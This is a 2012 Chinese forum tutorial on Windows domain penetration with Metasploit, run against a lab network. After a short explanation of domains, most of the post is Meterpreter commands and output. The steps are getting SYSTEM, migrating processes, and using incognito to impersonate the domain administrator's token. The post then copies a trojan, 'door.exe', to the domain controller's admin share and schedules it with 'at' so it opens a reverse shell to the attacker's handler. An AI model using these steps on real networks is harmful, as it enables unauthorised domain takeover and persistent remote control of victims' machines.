切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
150 域入侵 :metasploit[复制链接]
发表于 2012-9-11 01:09:44 | 显示全部楼层 |!read_mode!
前言

教学文档的150课
  域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时,域控制器首先要鉴别这台电脑是否是属于这个域的,用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,他只能以对等网用户的方式访问Windows共享出来的资源,这样就在一定程度上保护了网络上的资源。
很多时候我们在渗透的时候几乎都在内网旁注等xx操作,但是你知道吗,其实很多时候我们都进入了一个域,但你知道怎么进行域渗透吗?这里秒杀将为你科普下! 首先还是先简要看一下域的概念吧: 域 (Domain) 是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件 和打印机等设备资源,使不同的域之间实现网络资源的共享与管理。 域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。域管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者管理其他的域;每个域都有自己的安全策 略,以及它与其他域的安全信任关系。 通过上述的了解,我们可以知道域管理员的权限是相当大的,域管理员可以通过持有域的登陆票据从而实现对域内各个计算机的远程管理,即有权限登陆任何一台机器。

渗透测试

获得WIN2 2权限


  1. msf  exploit(handler) > [*] Sending stage (752128 bytes) to 1.1.1.7
  2. [*] Meterpreter session 2 opened (1.1.1.3:4444 -> 1.1.1.7:1140) at 2012-06-26 13:45:26 -0700

  3. msf  exploit(handler) > sessions -i 2
  4. [*] Starting interaction with 2...

  5. meterpreter >
复制代码
选转移进程,获得权限,

  1. meterpreter > getpid
  2. Current pid: 1012
  3. meterpreter > getsystem
  4. ...got system (via technique 1).
  5. meterpreter > ps

  6. Process List
  7. ============

  8. PID   PPID  Name              Arch  Session     User                          Path
  9. ---   ----  ----              ----  -------     ----                          ----
  10. 0     0     [System Process]        4294967295                                
  11. 4     0     System            x86   0           NT AUTHORITY\SYSTEM           
  12. 372   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
  13. 520   372   csrss.exe         x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
  14. 544   372   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
  15. 588   1556  door.exe          x86   0           DIS9TEAM-WEB\brk              $U$C:\Documents and Settings\brk\\door.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c62726b5cd7c0c3e65c646f6f722e657865
  16. 656   544   services.exe      x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
  17. 668   544   lsass.exe         x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
  18. 780   656   oyijtv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\oyijtv.exe
  19. 824   656   VBoxService.exe   x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\VBoxService.exe
  20. 868   656   svchost.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
  21. 884   656   jqs.exe           x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jqs.exe
  22. 956   656   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  23. 1012  1556  door.exe          x86   0           DIS9TEAM-WEB\brk              $U$C:\Documents and Settings\brk\\door.exe-0x433a5c446f63756d656e747320616e642053657474696e67735c62726b5cd7c0c3e65c646f6f722e657865
  24. 1036  656   metsvc.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\TEMP\pylKOWGaBzNTzUc\metsvc.exe
  25. 1048  656   svchost.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
  26. 1096  656   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  27. 1144  656   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
  28. 1284  656   mennkb.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\mennkb.exe
  29. 1356  1556  VBoxTray.exe      x86   0           DIS9TEAM-WEB\brk              C:\WINDOWS\system32\VBoxTray.exe
  30. 1404  656   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
  31. 1464  656   smkvye.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\smkvye.exe
  32. 1540  656   huslgx.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\huslgx.exe
  33. 1556  1948  explorer.exe      x86   0           DIS9TEAM-WEB\brk              C:\WINDOWS\Explorer.EXE
  34. 1788  1556  ctfmon.exe        x86   0           DIS9TEAM-WEB\brk              C:\WINDOWS\system32\ctfmon.exe
  35. 1828  1556  jusched.exe       x86   0           DIS9TEAM-WEB\brk              C:\Program Files\Common Files\Java\Java Update\jusched.exe
  36. 1868  656   kmyltu.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\kmyltu.exe
  37. 1900  656   fmklai.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\fmklai.exe
  38. 1944  656   alg.exe           x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe


  39. meterpreter > migrate 1048
  40. [*] Migrating to 1048...
  41. [*] Migration completed successfully.
  42. meterpreter >
复制代码
先测试一下:


  1. meterpreter > shell
  2. Process 1640 created.
  3. Channel 1 created.
  4. Microsoft Windows XP [�汾 5.1.2600]
  5. (C) ��Ȩ���� 1985-2001 Microsoft Corp.

  6. C:\WINDOWS\system32>net view
  7. net view
  8. ����������            ע�

  9. -------------------------------------------------------------------------------
  10. \\DIS9TEAM-DOMAIN      DIS9-Domain                                             
  11. \\DIS9TEAM-V2                                                                  
  12. \\DIS9TEAM-WEB                                                                 
  13. �����ɹ����ɡ�


  14. C:\WINDOWS\system32>dir \\DIS9TEAM-DOMAIN\c$
  15. dir \\DIS9TEAM-DOMAIN\c$
  16. �ܾ����ʡ�

  17. C:\WINDOWS\system32>
复制代码
无权限劫持域管理进入模块
  1. meterpreter > use incognito
  2. Loading extension incognito...success.
  3. meterpreter >
复制代码
查看域
  1. meterpreter > list_tokens -u

  2. Delegation Tokens Available
  3. ========================================
  4. DIS9\Administrator
  5. DIS9TEAM-WEB\brk
  6. NT AUTHORITY\LOCAL SERVICE
  7. NT AUTHORITY\NETWORK SERVICE
  8. NT AUTHORITY\SYSTEM

  9. Impersonation Tokens Available
  10. ========================================
  11. NT AUTHORITY\ANONYMOUS LOGON

  12. meterpreter >
复制代码
DIS9\Administrator就是域管理,我们劫持他
  1. meterpreter > impersonate_token DIS9\\Administrator
  2. [+] Delegation token available
  3. [+] Successfully impersonated user DIS9\Administrator
  4. meterpreter > getuid
  5. Server username: DIS9\Administrator
  6. meterpreter >
复制代码
成功了

获得权限上传木马到获得的普通机子 1.1.1.7
  1. meterpreter > upload /var/www/door.exe c:\
  2. [*] uploading  : /var/www/door.exe -> c:\
  3. [*] uploaded   : /var/www/door.exe -> c:\\door.exe
  4. meterpreter > shell
  5. Process 1732 created.
  6. Channel 5 created.
  7. Microsoft Windows XP [�汾 5.1.2600]
  8. (C) ��Ȩ���� 1985-2001 Microsoft Corp.

  9. C:\WINDOWS\system32>dir c:\
  10. dir c:\
  11. ������ C �еľ�û�б�ǩ��
  12. ��������� 745F-82DD

  13. c:\ ��Ŀ¼

  14. 2012-06-22  07:36                 0 AUTOEXEC.BAT
  15. 2012-06-22  07:36                 0 CONFIG.SYS
  16. 2012-06-26  06:49    <DIR>          Documents and Settings
  17. 2012-06-27  04:59            73,802 door.exe
  18. 2012-06-25  00:37    <DIR>          Program Files
  19. 2012-06-23  01:53    <DIR>          soft
  20. 2012-06-27  03:54    <DIR>          WINDOWS
  21. 2012-06-27  03:39                 0 �½� �ı��ĵ�.txt
  22.                4 ���ļ�         73,802 �ֽ
  23.                4 ��Ŀ¼ 40,590,536,704 �����ֽ

  24. C:\WINDOWS\system32>
复制代码
复制到DIS9域管理机子
  1. C:\>copy door.exe \\DIS9TEAM-DOMAIN\c$
  2. copy door.exe \\DIS9TEAM-DOMAIN\c$
  3. �Ѹ���         1 ���ļ���

  4. C:\>
复制代码
获得DIS9TEAM-DOMAIN的时间
  1. C:\>net time \\DIS9TEAM-DOMAIN
  2. net time \\DIS9TEAM-DOMAIN
  3. \\DIS9TEAM-DOMAIN �ĵ�ǰʱ���� 2012/6/27 ���� 05:02

  4. �����ɹ����ɡ�


  5. C:\>
复制代码
时间是05.02,添加一项作业 5.04运行 然后MSF监听
  1. C:\at \\DIS9TEAM-DOMAIN 05:04 c:\door.exe
  2. at \\DIS9TEAM-DOMAIN 05:04 c:\door.exe
  3. �¼���һ����ҵ������ҵ ID = 3

  4. C:\>exit
  5. meterpreter > background
  6. [*] Backgrounding session 2...
  7. msf  exploit(handler) > exploit

  8. [*] Started reverse handler on 1.1.1.3:4444
  9. [*] Starting the payload handler...
复制代码

继续拿下其他机子



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-28 06:59

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部